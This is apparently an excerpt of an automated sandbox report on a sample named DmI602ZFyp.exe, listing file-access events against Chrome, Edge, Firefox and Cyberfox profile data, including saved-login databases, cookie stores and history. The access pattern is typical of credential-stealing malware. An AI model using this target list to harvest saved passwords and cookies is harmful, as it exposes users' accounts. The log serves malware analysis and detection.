Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10 Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Directory queried: C:\Users\Default\Documents Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Directory queried: C:\Users\Public\Documents